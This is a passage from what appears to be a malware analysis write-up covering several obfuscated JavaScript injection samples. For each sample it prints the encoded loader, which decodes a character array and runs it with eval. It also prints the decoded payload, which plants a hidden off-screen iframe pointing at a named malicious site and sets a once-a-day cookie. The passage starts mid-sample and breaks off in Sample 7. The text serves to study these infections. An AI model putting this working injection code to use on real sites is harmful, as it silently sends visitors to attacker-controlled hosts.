  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         xob09();
  89.  
  90.     }
  91.  
  92. }


Sample 4 

Beautified script 

  1. /*32f02e*/
  2. if (document.querySelector) zq = 4;
  3. =("27,6d,7c,75,6a,7b,70,76,75,27,77,7c,80,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,7c,80,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,7c,80,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7e,7e,7e,35,74,76,69,70,73,6c,73,70,6d,7b,76,6d,6d,35,6a,76,74,36,70,74,68,6e,6c,7a,36,69,54,5f,5e,59,5b,53,6e,35,77,6f,77,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,77,7c,80,63,2e,27,6a,73,68,7a,7a,44,63,2e,77,7c,80,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,77,7c,80,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,77,7c,80,37,40,2f,30,42,14,11,84,14,11,84".split(","));
  4. = eval;
  5. functionvqvq() {
  6.     zva = function () {
  7.         -- (d.body)
  8.     }()
  9. }
  10. = document;
  11. for (= 0; i < a.length; i += 1) {
  12.     a[i] = -(12 - 5) + parseInt(a[i], zq * 4);
  13. }
  14. try {
  15.     vqvq()
  16. } catch (q) {
  17.     yy = 50 - 50;
  18. }
  19. try {
  20.     yy /= 123
  21. } catch (pq) {
  22.     yy = 1;
  23. }
  24. if (!yy) r(String["fr" + "omCh" + "arCo" + "de"].apply(String, a));


Malicious payload

Decoded payload generates hidden iframe to http://www.mobileliftoff.com/images/bMXWRTLg.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function puy09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var puy = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     puy.src = 'http://www.mobileliftoff.com/images/bMXWRTLg.php';
  12.  
  13.     puy.style.position = 'absolute';
  14.  
  15.     puy.style.color = '98279';
  16.  
  17.     puy.style.height = '98279px';
  18.  
  19.     puy.style.width = '98279px';
  20.  
  21.     puy.style.left = '100098279';
  22.  
  23.     puy.style.top = '100098279';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('puy')) {
  28.  
  29.         document.write('<p id=\'puy\' class=\'puy09\' ></p>');
  30.  
  31.         document.getElementById('puy').appendChild(puy);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76. }
  77.  
  78. if (navigator.cookieEnabled)
  79. {
  80.     if (GetCookie('visited_uq') == 55) {} else {
  81.         SetCookie('visited_uq', '55', '1', '/');
  82.         puy09();
  83.     }
  84. }

Sample 5 

Beautified script 

  1. hzced = "s" + "p" + "li" + "t";
  2. mlrc = window;
  3. qrnzh = "dy";
  4. mpqrf = document;
  5. sfoxdi = "0x";
  6. dnt = (5 - 3 - 1);
  7. try {
  8.     ++(mpqrf.body)
  9. } catch (wlbeaq) {
  10.     eerq = false;
  11.     try {} catch (lmb) {
  12.         eerq = 21;
  13.     }
  14.     if (1) {
  15.         wrlsgy ="17:5d:6c:65:5a:6b:60:66:65:17:6e:63:71:6c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6e:63:71:6c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6e:63:71:6c:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:62:5a:69:6b:69:6c:5a:62:60:65:5e:25:5a:66:64:26:45:41:3f:4b:62:2a:4d:3a:25:67:5f:67:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2e:2a:29:30:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2e:2a:29:30:67:6f:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2e:2a:29:30:67:6f:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2e:2a:29:30:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2e:2a:29:30:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6e:63:71:6c:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6e:63:71:6c:53:1e:17:5a:63:58:6a:6a:34:53:1e:6e:63:71:6c:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6e:63:71:6c:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:6e:63:71:6c:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6e:63:71:6c:27:30:1f:20:32:4:1:74:4:1:74"[hzced](":");
  16.     }
  17.     mlrc = wrlsgy;
  18.     axrc = [];
  19.     for (rmjtk = 22 - 20 - 2; - rmjtk + 1418 != 0; rmjtk += 1) {
  20.         urhuyl = rmjtk;
  21.         if ((0x19 == 031)) axrc += String["fromCharCode"](eval(sfoxdi + mlrc[1 * urhuyl]) + 0xa - dnt);
  22.     }
  23.     eval(axrc);
  24. }


Malicious payload

Decoded payload generates hidden iframe to http://www.kcrtrucking.com/NJHTk3VC.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function wlzu09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var wlzu = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     wlzu.src = 'http://www.kcrtrucking.com/NJHTk3VC.php';
  12.  
  13.     wlzu.style.position = 'absolute';
  14.  
  15.     wlzu.style.color = '7329';
  16.  
  17.     wlzu.style.height = '7329px';
  18.  
  19.     wlzu.style.width = '7329px';
  20.  
  21.     wlzu.style.left = '10007329';
  22.  
  23.     wlzu.style.top = '10007329';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('wlzu')) {
  28.  
  29.         document.write('<p id=\'wlzu\' class=\'wlzu09\' ></p>');
  30.  
  31.         document.getElementById('wlzu').appendChild(wlzu);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         wlzu09();
  89.  
  90.     }
  91.  
  92. }


Sample 6 

Beautified script 

  1. dzfs = document;
  2. oftkq = "spl" + "i" + "t";
  3. zlxzg = window;
  4. sjadw = "0" + "x";
  5. nkja = (5 - 3 - 1);
  6. try {
  7.     --(dzfs["body"])
  8. } catch (hafwrq) {
  9.     yaw = false;
  10.     try {} catch (rtob) {
  11.         yaw = 21;
  12.     }
  13.     if (1) {
  14.         tldot ="17:5d:6c:65:5a:6b:60:66:65:17:63:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:5c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:63:5c:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:66:6f:63:66:6f:6c:63:25:65:5c:6b:26:60:59:64:25:67:5f:67:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:2b:27:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:2b:27:67:6f:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:2b:27:67:6f:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:2b:27:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:5c:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:63:5c:53:1e:17:5a:63:58:6a:6a:34:53:1e:63:5c:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:5c:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:63:5c:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:5c:27:30:1f:20:32:4:1:74:4:1:74"[oftkq](":");
  15.     }
  16.     zlxzg = tldot;
  17.     ljy = [];
  18.     for (jnjw = 22 - 20 - 2; - jnjw + 1370 != 0; jnjw += 1) {
  19.         yfap = jnjw;
  20.         if ((0x19 == 031)) ljy += String.fromCharCode(eval(sjadw + zlxzg[1 * yfap]) + 0xa - nkja);
  21.     }
  22.     dbbvw = eval;
  23.     dbbvw(ljy)
  24. }


Malicious payload

Decoded payload generates hidden iframe to http://oxloxul.net/ibm.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function le09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var le = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     le.src = 'http://oxloxul.net/ibm.php';
  12.  
  13.     le.style.position = 'absolute';
  14.  
  15.     le.style.color = '840';
  16.  
  17.     le.style.height = '840px';
  18.  
  19.     le.style.width = '840px';
  20.  
  21.     le.style.left = '1000840';
  22.  
  23.     le.style.top = '1000840';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('le')) {
  28.  
  29.         document.write('<p id=\'le\' class=\'le09\' ></p>');
  30.  
  31.         document.getElementById('le').appendChild(le);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         le09();
  89.  
  90.     }
  91.  
  92. }

Sample 7 

Beautified script 

  1. qhz = "s" + "p" + "li" + "t";
  2. koibb = window;
  3. prfiim = "dy";
  4. vvca = document;
  5. gxccx = "0x";
  6. ylwyp = (5 - 3 - 1);
  7. try {
  8.     ++(vvca.body)
  9. } catch (grt) {
  10.     qtedij = false;
  11.     try {} catch (kkqh) {
  12.         qtedij = 21;
  13.     }
  14.     if (1) {
